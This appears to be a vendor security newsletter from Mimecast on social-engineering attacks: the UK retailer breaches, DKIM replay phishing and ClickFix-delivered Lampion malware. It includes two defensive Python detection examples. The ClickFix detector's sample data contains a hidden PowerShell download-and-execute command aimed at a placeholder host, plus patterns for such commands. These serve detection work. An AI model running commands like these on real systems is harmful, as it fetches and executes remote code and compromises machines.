
    Human Risk Roundup

    Real-world Cyber Threats and Practical Tips to Protect Your Organization from Human Vulnerabilities

    by Joan Goodchild

    In the inaugural edition of the Human Risk Roundup, we delve into recent, real-world examples of how cybercriminals exploit human vulnerabilities to breach organizational defenses. Designed for CISOs and security leaders, this regular feature from Mimecast provides actionable insights into the evolving tactics and psychological strategies used by attackers, helping you stay ahead in safeguarding your organization’s most critical asset—its people.

    This week’s issue highlights the Scattered Spider attacks on UK retailers, phishing campaigns that exploit Google’s infrastructure through DKIM replay attacks, the resurgence of Lampion malware using ClickFix lures, and more. Each story provides actionable insights for security leaders looking to enhance their human risk management strategies.

    Scattered Spider Attacks on UK Retailers: A Lesson in Human Exploitation

    In late April 2025, a series of coordinated cyberattacks struck three major UK retailers—Marks & Spencer (M&S), Co-op Group, and Harrods. Though the attribution remains unofficial, cybersecurity researchers strongly suspect the involvement of the notorious hacking group 'Scattered Spider.' This group is infamous for exploiting human vulnerabilities rather than leveraging advanced technical exploits.

    What happened: According to BBC reports, the attack on M&S started around the Easter weekend, initially disrupting Click & Collect services and contactless payments. The ransomware incident halted payment systems, paused online orders, and significantly impacted supply chains. Some suppliers, including Greencore and Nails Inc., resorted to manual processes to meet delivery demands due to operational challenges. M&S lost approximately £3.8 million per day in online sales, and the attack wiped an estimated £500–700 million off its market value. Investigations suggest attackers gained access via stolen credentials obtained through techniques like phishing or multi-factor authentication (MFA) bombing. While some systems have resumed, the broader fallout continues to affect operations.

    The Co-op Group also faced a devastating cyberattack this month, carried out through sophisticated social engineering. Attackers impersonated staff to manipulate IT personnel into resetting passwords, gaining unauthorized access to critical systems. The breach led to logistics disruptions, causing fresh food shortages in many Co-op stores, particularly in Scotland's islands. To contain the threat, Co-op implemented measures such as limiting internet access and enhancing verification protocols for virtual meetings. The National Cyber Security Centre (NCSC) has since advised retailers to fortify password reset processes to curb similar risks.

    Harrods, on the other hand, successfully countered a cyberattack attempt by taking swift precautionary measures. The company restricted internet access across its operations following unauthorized access attempts linked to social engineering tactics. The luxury retailer's proactive approach prevented further intrusion, though details of the breach remain undisclosed.

    Why It Matters: These incidents underline the growing threat of human-focused cyberattacks in retail. M&S serves as a prime example of how compromised credentials and human vulnerabilities can lead to financial and operational turmoil. Co-op illustrates the severe consequences of social engineering within trusted internal processes, while Harrods highlights the importance of rapid detection and action to mitigate threats. Investing in targeted training, strengthening protocols, and equipping employees with the tools to recognize social engineering attempts will be vital in reducing human risk and bolstering organizational resilience.

    Read more about these attacks in our Mimecast blog.

    Phishing via Google Infrastructure: A Sophisticated Attack on Human Trust

    In a new wave of phishing campaigns, attackers have found a way to exploit Google’s trusted infrastructure to send emails that appear authentic. According to The Hacker News, these emails, seemingly from 'no-reply@google.com,' informed recipients of a supposed subpoena from a law enforcement authority. The emails directed users to a Google Sites page that mimicked legitimate Google Support, urging them to upload documents or view case details.

    What Happened: Attackers leveraged a DKIM replay attack, allowing them to create an email with a valid signature that bypasses security filters. This technique involves creating a legitimate Google OAuth application, generating a security alert, and forwarding it while preserving the DKIM signature. As a result, the phishing emails appeared to come from legitimate Google accounts, deceiving even advanced security systems.

    Why It Matters: Exploiting trusted platforms to deliver malicious content is an emerging challenge for IT security teams. As attackers increasingly use legitimate cloud services for phishing, traditional detection methods become less effective. Organizations should focus on user education about identifying phishing attempts, even when emails appear trustworthy.
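    A DKIM signature stays valid when a signed message is forwarded, which is what a replay relies on; DKIM does not bind the signature to the mailbox the message was actually delivered to. The following added example (written for this roundup, not Mimecast's or Google's code) shows a defender-side heuristic: it checks that the To: header is covered by the signature and that the signed To: matches the Delivered-To: recipient. The sample message, selector, hash and signature values are constructed placeholders, and the check assumes the cryptographic verification itself has already passed upstream.

```python
from email import message_from_string
from email.utils import getaddresses

# Constructed sample, not a captured message: the d=google.com signature is
# intact, but the mailbox the signer addressed differs from the real recipient.
RAW_MSG = """\
Delivered-To: victim@example.org
DKIM-Signature: v=1; a=rsa-sha256; d=google.com; s=selector-placeholder;
 h=to:from:subject:date; bh=placeholderbodyhash=; b=placeholdersignature=
From: Google <no-reply@google.com>
To: <forwarder@attacker-controlled.example>
Subject: Notice of Legal Process
Date: Wed, 16 Apr 2025 10:00:00 +0000

Please review the case details.
"""

def parse_dkim_tags(header):
    """Split a (possibly folded) DKIM-Signature header into its tag=value pairs."""
    tags = {}
    for part in header.replace("\r", "").replace("\n", "").split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags

def replay_indicators(raw):
    """Return the reasons a message looks like a DKIM replay (empty list = clean).

    Assumes the signature already verified upstream; a replay passes that check
    by design, so the question is whether the signed headers fit this delivery."""
    msg = message_from_string(raw)
    sig = msg.get("DKIM-Signature")
    if not sig:
        return ["no DKIM-Signature header"]
    reasons = []
    tags = parse_dkim_tags(sig)
    signed_headers = {h.strip().lower() for h in tags.get("h", "").split(":")}
    if "to" not in signed_headers:
        reasons.append("To: header not covered by signature")
    signed_to = {addr.lower() for _, addr in getaddresses(msg.get_all("To", []))}
    delivered = {addr.lower() for _, addr in getaddresses(msg.get_all("Delivered-To", []))}
    if signed_to and delivered and not (signed_to & delivered):
        reasons.append("signed To: does not include actual recipient")
    return reasons

if __name__ == "__main__":
    print(replay_indicators(RAW_MSG))
```

    A mismatch alone is not proof (mailing lists and legitimate forwards trigger it too), so treat it as one signal to weigh alongside the sender reputation and content checks already in place.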

    Read more about it in The Hacker News.

    Lampion Malware Returns with ClickFix Social Engineering Lures

    The Lampion malware, notorious for targeting banking information, has resurfaced with a new attack vector called ClickFix. As reported by Palo Alto Networks, this technique manipulates users into executing malicious commands by convincing them that the action will resolve a system issue.

    What Happened: The campaign targets Portuguese organizations, particularly in the finance, government, and transportation sectors. Attackers send phishing emails containing a malicious ZIP file, which, when opened, directs users to a fake tax authority site. Victims are instructed to run a PowerShell command, resulting in data theft and system compromise. The malware also uses multiple obfuscation techniques to hide its true function, making detection particularly challenging.

    Why It Matters: ClickFix represents a growing trend where attackers manipulate users directly rather than exploiting system vulnerabilities. Security leaders should enhance awareness of this technique and implement monitoring tools that detect suspicious command-line executions.
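    The monitoring the paragraph calls for can start from process-creation telemetry: a ClickFix lure ends with the user launching PowerShell from their own desktop, so a child PowerShell process of a user shell with hidden-window, policy-bypass, encoded or download-and-execute switches is a strong combination. This added example (not from the original post or Palo Alto Networks) scores constructed events against those indicators; the event layout, parent-process list and sample command lines are assumptions, not real telemetry.

```python
import re

# Constructed process-creation events, not real telemetry.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://fake-tax-site.invalid/x)"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand SQBFAFgAIAAuAC4ALgA="},
    {"parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\work\\build.ps1"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "dir"'},
]

# Parents that indicate the user typed or pasted the command (Run dialog, terminal).
USER_LAUNCHED_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

# Switches and cmdlets commonly combined in a paste-and-run lure; each alone is
# also seen in legitimate administration, hence the threshold below.
PATTERNS = {
    "hidden window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy bypass":   re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded command": re.compile(r"-enc(odedcommand)?\b", re.I),
    "remote download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl)\b", re.I),
    "in-memory exec":  re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def score_event(ev):
    """Return the indicator names matched by one process-creation event."""
    image = ev["image"].lower()
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return []
    hits = [name for name, rx in PATTERNS.items() if rx.search(ev["cmdline"])]
    if ev["parent"].lower() in USER_LAUNCHED_PARENTS:
        hits.append("launched from user shell")
    return hits

def suspicious_events(events, threshold=2):
    """Events with at least `threshold` indicators, paired with their reasons."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= threshold:
            flagged.append((ev["cmdline"], hits))
    return flagged

if __name__ == "__main__":
    for cmdline, hits in suspicious_events(EVENTS):
        print(f"{cmdline}\n    -> {', '.join(hits)}")
```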

    Read more here.

    Combat Human Risk with Mimecast

    Take control of human risk with Mimecast. Our advanced solutions block over 90% of email-based threats, target vulnerabilities effectively, and empower your employees with the tools and training they need to stay secure. Explore how Mimecast can help safeguard your organization against cyber threats and mitigate human risk today.
